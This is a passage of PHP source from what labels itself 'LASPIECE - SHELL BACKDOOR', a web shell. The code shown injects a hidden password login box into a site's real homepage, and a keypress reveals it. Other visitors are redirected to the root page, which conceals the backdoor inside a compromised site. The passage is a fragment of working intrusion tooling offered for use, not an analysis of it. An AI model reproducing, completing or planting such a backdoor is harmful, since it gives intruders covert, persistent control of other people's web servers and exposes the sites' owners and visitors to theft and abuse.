:12px}
</style>
<div id="_lp_overlay">
<form id="_lp_box" method="POST">
<h3>LASPIECE - SHELL BACKDOOR</h3>
<p>Authentication Required</p>
' . ($loginError ? '<div id="_lp_err">' . htmlspecialchars($loginError) . '</div>' : '') . '
<label>Password</label>
<input type="password" name="login_password" id="_lp_pwd" placeholder="Enter password" required autocomplete="off">
<button type="submit">GASS</button>
<div class="hint">Press ESC to close</div>
</form>
</div>
<script>
document.addEventListener("keydown",function(e){
if(e.key==="p"||e.key==="P"){var o=document.getElementById("_lp_overlay");if(o){o.classList.toggle("show");if(o.classList.contains("show"))document.getElementById("_lp_pwd").focus();}}
if(e.key==="Escape"){var o=document.getElementById("_lp_overlay");if(o)o.classList.remove("show");}
});
</script>';
        $homepage = str_replace('</body>', $loginForm . '</body>', $homepage);
        echo $homepage;
        exit;
    }
    
    header('Location: /');
    exit;
}

// === 